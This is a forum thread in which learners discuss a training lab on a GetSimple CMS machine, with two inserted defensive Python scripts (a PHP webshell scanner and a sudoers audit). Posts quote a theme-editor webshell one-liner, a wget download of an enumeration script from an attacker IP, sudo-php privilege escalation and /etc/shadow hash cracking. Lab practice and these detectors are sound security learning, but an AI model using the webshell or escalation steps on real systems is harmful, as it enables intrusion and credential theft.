Getting started | Knowledge Check

Is there any other way to get in without using Metasploit? (Using Metasploit was pretty simple in this one; I was able to capture the user flag without any hassle.) I was able to log in as admin and I was searching for possible vulns on the web, but I am not able to find any successful method (I tried editing the themes for a PHP reverse shell but there was no response). I am still trying to look for a potential way to exploit it without using Metasploit… If anyone has found something, we can discuss :smile:

Hey guys. I'm still working on this task (almost 1 week) and I have no idea how to escalate privileges. I use Metasploit for it and have already improved the shell, but what's next? Could someone give a little nudge?

I'm stuck on the priv esc portion as well. I'm sure that the /usr/bin/php binary plays a role in escalating privileges; I'm just not quite sure how to proceed.

@galertaw said:

So I am now able to spawn a bash reverse shell and run linpeas. But it says nothing interesting besides php NOPASSWD, which I already knew from 'sudo -l'.
Keep searching

How were you able to transfer LinPEAS, and how did your sudo -l work? I was not able to access any other commands like sudo and echo… but I was able to spawn a web shell using the theme editor. It was working, but I was still not able to use other commands, only ls and cat and maybe some more of the defaults.

OK, so here is one interesting thing I got… I was able to spawn a web shell using the following steps:
1. I was able to log in as admin through the page.
2. Then I started the Metasploit scan and navigated the whole system for like 3-4 days.
3. Then I started googling again and found out something about a GetSimple CMS 3.1.15 vulnerability that is in the theme editor.
4. I visited the theme editor and tried to edit the PHP files there, and was able to spawn a webshell using the one-liner <?php echo shell_exec($_GET['e'].' 2>&1'); ?>
5. Then I tried the sudo -l command and it worked… (remember to URL-encode spaces to run commands)
This is my progress until now…
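A defender-side check related to the theme-editor step above, added here as an example and not code from the thread or from GetSimple CMS: it walks a theme directory and flags PHP templates where request data ($_GET and the other superglobals) reaches a command-execution function, which is exactly the shape of the one-liner quoted in this post. The directory layout, file names and template contents are constructed for the demo.

```python
"""Webshell indicator scan for CMS theme directories (added example)."""
import os
import re
import tempfile

# PHP functions that hand a string to a shell or to the interpreter.
EXEC_SINKS = ("shell_exec", "exec", "system", "passthru", "popen",
              "proc_open", "eval", "assert")
SINK_RE = re.compile(r"\b(" + "|".join(EXEC_SINKS) + r")\s*\(", re.IGNORECASE)
# Superglobals that carry attacker-controlled request data.
SOURCE_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")
# The backtick operator is shell_exec() in disguise.
BACKTICK_RE = re.compile(r"`[^`\n]+`")


def scan_php_source(src: str):
    """Return (line_no, reason) findings for one PHP source text."""
    findings = []
    for n, line in enumerate(src.splitlines(), start=1):
        sinks = SINK_RE.findall(line)
        tainted = SOURCE_RE.search(line) is not None
        if sinks and tainted:
            findings.append((n, f"request data reaches {sinks[0].lower()}()"))
        elif sinks:
            findings.append((n, f"exec sink {sinks[0].lower()}() in template"))
        if BACKTICK_RE.search(line):
            findings.append((n, "backtick shell operator in template"))
    return findings


def scan_theme_dir(root: str):
    """Walk root; return {relative path: findings} for every flagged PHP file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith((".php", ".phtml")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report


# Constructed sample theme: a clean template and one carrying the
# shell_exec one-liner quoted in the post above.
CLEAN_TEMPLATE = "<?php get_header(); ?>\n<h1><?php get_page_title(); ?></h1>\n"
TAMPERED_TEMPLATE = ("<?php get_header(); ?>\n"
                     "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>\n")


def demo():
    """Write the constructed theme to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "mytheme")
        os.makedirs(theme)
        with open(os.path.join(theme, "template.php"), "w", encoding="utf-8") as fh:
            fh.write(CLEAN_TEMPLATE)
        with open(os.path.join(theme, "footer.inc.php"), "w", encoding="utf-8") as fh:
            fh.write(TAMPERED_TEMPLATE)
        return scan_theme_dir(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        for line_no, reason in hits:
            print(f"{path}:{line_no}: {reason}")
```

Running it on a real install means pointing scan_theme_dir at the CMS theme folder and diffing the report against a baseline taken right after deployment; any new hit in a template that the theme editor can write to is worth a look, since that is precisely the file an editor-based tampering would touch.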

@SPARTANone17 said:

OK, so here is one interesting thing I got… I was able to spawn a web shell using the following steps:
1. I was able to log in as admin through the page.
2. Then I started the Metasploit scan and navigated the whole system for like 3-4 days.
3. Then I started googling again and found out something about a GetSimple CMS 3.1.15 vulnerability that is in the theme editor.
4. I visited the theme editor and tried to edit the PHP files there, and was able to spawn a webshell using the one-liner <?php echo shell_exec($_GET['e'].' 2>&1'); ?>
5. Then I tried the sudo -l command and it worked… (remember to URL-encode spaces to run commands)
This is my progress until now…

Thanks, following your steps led me to the initial shell. From here though, I had to get a true reverse shell to exploit a certain binary that sudo can run. GTFOBins led the way for me afterwards!

Finally!!! Jesus… you have to be fast, otherwise the machine just dies.

@dewest91 said:

Thanks, following your steps led me to the initial shell. From here though, I had to get a true reverse shell to exploit a certain binary that sudo can run. GTFOBins led the way for me afterwards!

How were you able to get a true REVERSE SHELL!!! I have tried like 50 times till now and still I am not able to spawn a true shell. I know that afterwards I have to exploit the php vulnerability using GTFOBins, but how? Please help…

@SPARTANone17 said:

How were you able to get a true REVERSE SHELL!!! I have tried like 50 times till now and still I am not able to spawn a true shell. I know that afterwards I have to exploit the php vulnerability using GTFOBins, but how? Please help…

I uploaded a PHP web shell on the theme editor page, then set up a listener on my local machine, and used a PHP reverse shell one-liner.

@dewest91 said:

I uploaded a PHP web shell on the theme editor page, then set up a listener on my local machine, and used a PHP reverse shell one-liner.

BUT were you able to navigate out of the current working directory? Because last time I tried, I wasn't able to navigate out of the current working directory. And that's not all: how were you able to use the PHP webshell and listen on your device? How were you able to use a listener with a PHP webshell, given that a webshell is accessed by using the web browser or cURL?
But I am gonna try it now and explore myself. I will read your answer after I complete the module :smiley:

@SPARTANone17 said:

BUT were you able to navigate out of the current working directory? Because last time I tried, I wasn't able to navigate out of the current working directory.

OK, I was able to get the root flag as well… Thanks for the help @dewest91 :smile:

I wonder if anyone is able to offer a helping hand, as I'm unsure how to progress. I have managed to gain a foothold by using the GetSimple msf exploit and have submitted the user flag; however, when trying to upload LinEnum I get the 200 OK response, but then it is followed by permission denied?

I'm sure I'm doing something wrong (as is the case most of the time), but I'm just wondering if I am missing something stupidly obvious?

Just to be clear… LinEnum.sh onto the target machine by using wget http://10.10.16.95:8080/LinEnum.sh, then I receive the following:

'–2021-06-28 09:56:14-- http://10.10.16.95:8080/LinEnum.sh
Connecting to 10.10.16.95:8080… connected.
HTTP request sent, awaiting response… 200 OK
Length: 46631 (46K) [text/x-sh]
LinEnum.sh: Permission denied

Cannot write to ‘LinEnum.sh’ (Permission denied).’


So I was able to run a reverse shell via the upload command in msfconsole and curl… then… stuck.

Yes, I uploaded linenum.sh and linpeas.sh and ran them. I found exploits by grepping CVE in the reports… but they don't apply.

Like there's a sudoedit vulnerability that appears to be patched already, even though the version should expose something (I ran a Python script and a compiled C program), but the sudoedit output indicates it was fixed.

sudo -l… Nothing exciting.

Dirty_sock/snap-confine is shown in the report, but uploading a Python exploit says it's not vulnerable.

So round and round I go for days, trying to do this. And the kicker is, usually if you know the right answer it takes 60 seconds.

The hint points to the linpeas.sh report but I got nothing.

Oh I see now. Much simpler than I was headed.

Nevermind.

I've just completed this one. The first flag (just getting a foothold) was quite easy, but the second (privilege escalation) took me a full day to figure out. I think the point was to SSH into the box as a more privileged user and get the second flag. I did that, but it's not actually necessary: you can get to the flag as a 'low privilege user' without having to SSH.

The hint for how I did it is:

  1. (You need to get a shell on the target).

  2. Look for the command available to you with sudo privileges. A comment above says linpeas/linenum does not help, but it showed me exactly what I needed.

  3. Find how to call system commands (through that command as sudo) to access the restricted folders.

For fun(?) I then plundered /etc/shadow, got the password hash of a user with sudo privileges, cracked it in hashcat, then SSH'ed into the target machine and got the flag. But to get to the shadow file you need the same privileges required to get the flag, so it's not actually necessary.

I hope that helps

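Related to step 2 of the hint above (what sudo -l shows), here is an added example that is not from the thread or from any tool it mentions: a small audit of sudoers-style rules that flags entries granting an interpreter or editor able to spawn a shell, with NOPASSWD raised to the highest severity. The rule lines and the list of shell-capable binaries are constructed for the demo, and that list is illustrative rather than complete.

```python
"""Audit sudoers-style rules for shell-capable commands (added example)."""
import os
import re

# Binaries that can run arbitrary commands or drop to a shell once started.
# Illustrative list for the demo, not a complete inventory.
SHELL_CAPABLE = {
    "php", "python", "python3", "perl", "ruby", "node", "lua",
    "bash", "sh", "zsh", "vim", "vi", "nano", "less", "more",
    "man", "awk", "find", "env",
}

# Shape:  user  host=(runas)  [TAG: ...] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+?)\s*$"
)


def parse_rule(line: str):
    """Parse one rule line; return None for blanks, comments and Defaults."""
    stripped = line.strip()
    if not stripped or stripped.startswith(("#", "Defaults")):
        return None
    m = RULE_RE.match(stripped)
    if not m:
        return None
    cmds = []
    for spec in m.group("cmds").split(","):
        spec = spec.strip()
        tags = []
        # Leading upper-case words followed by ':' are tags such as NOPASSWD:
        while ":" in spec and spec.split(":", 1)[0].strip().isupper():
            tag, spec = spec.split(":", 1)
            tags.append(tag.strip())
            spec = spec.strip()
        cmds.append({"tags": tags, "cmd": spec})
    runas = (m.group("runas") or "root").strip()
    return {"who": m.group("who"), "host": m.group("host"),
            "runas": runas, "cmds": cmds}


def audit(rules_text: str):
    """Return (who, command, verdict) for every rule worth a second look."""
    findings = []
    for line in rules_text.splitlines():
        rule = parse_rule(line)
        if rule is None:
            continue
        for entry in rule["cmds"]:
            cmd = entry["cmd"]
            if cmd == "ALL":
                findings.append((rule["who"], cmd, "unrestricted ALL"))
                continue
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_CAPABLE:
                severity = "high" if "NOPASSWD" in entry["tags"] else "medium"
                findings.append((rule["who"], cmd,
                                 f"{severity}: {binary} can spawn a shell as {rule['runas']}"))
    return findings


# Constructed sample; the www-data line is the shape the thread describes.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults env_reset
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
www-data ALL=(ALL) NOPASSWD: /usr/bin/php
backup ALL=(root) /usr/bin/rsync, /usr/bin/vim
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
"""

if __name__ == "__main__":
    for who, cmd, verdict in audit(SAMPLE_SUDOERS):
        print(f"{who:10} {cmd:40} {verdict}")
```

The point of the check is the one the hint makes: a rule that hands a web-server account an interpreter as root is equivalent to handing it a root shell, whether or not a password is required, so the fix is to grant a narrowly scoped wrapper script instead of the interpreter itself.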

Hello everyone, I'll share my experience of how I found the first file and what steps I followed.
After all the scanning and a little research, I was able to get a shell with Metasploit, using module 1. How does it work? Well, this exploit creates a PHP file for the session created by Meterpreter. So what I did was edit that file and enter the shell code, which after that allowed me to dig around and get the first file, user.txt. Now I'm going for the second flag.

You're on the right track!

Could someone help me with this? I have been stuck for the past week, but I am just not able to log in! I believe I found the password, but I kind of suspect it's an encrypted one! I tried decrypting it but no luck! As a result, I am not able to log in and so am not able to gain the initial foothold!

Yes, it should be encrypted. You can try searching for a hash detector on Google and paste that key there to see what type of hash you want to decrypt, and then you can try different tools like John and hashcat to decrypt it. If you don't know how to use them, search on the Internet. It's supposed to be this way; don't worry, you are on the right learning path.

Okay, I got in. I tried searching around the website, but the upload button doesn't seem to be working. Is there any other way I can upload the shell? I tried creating a new page, but that didn't work.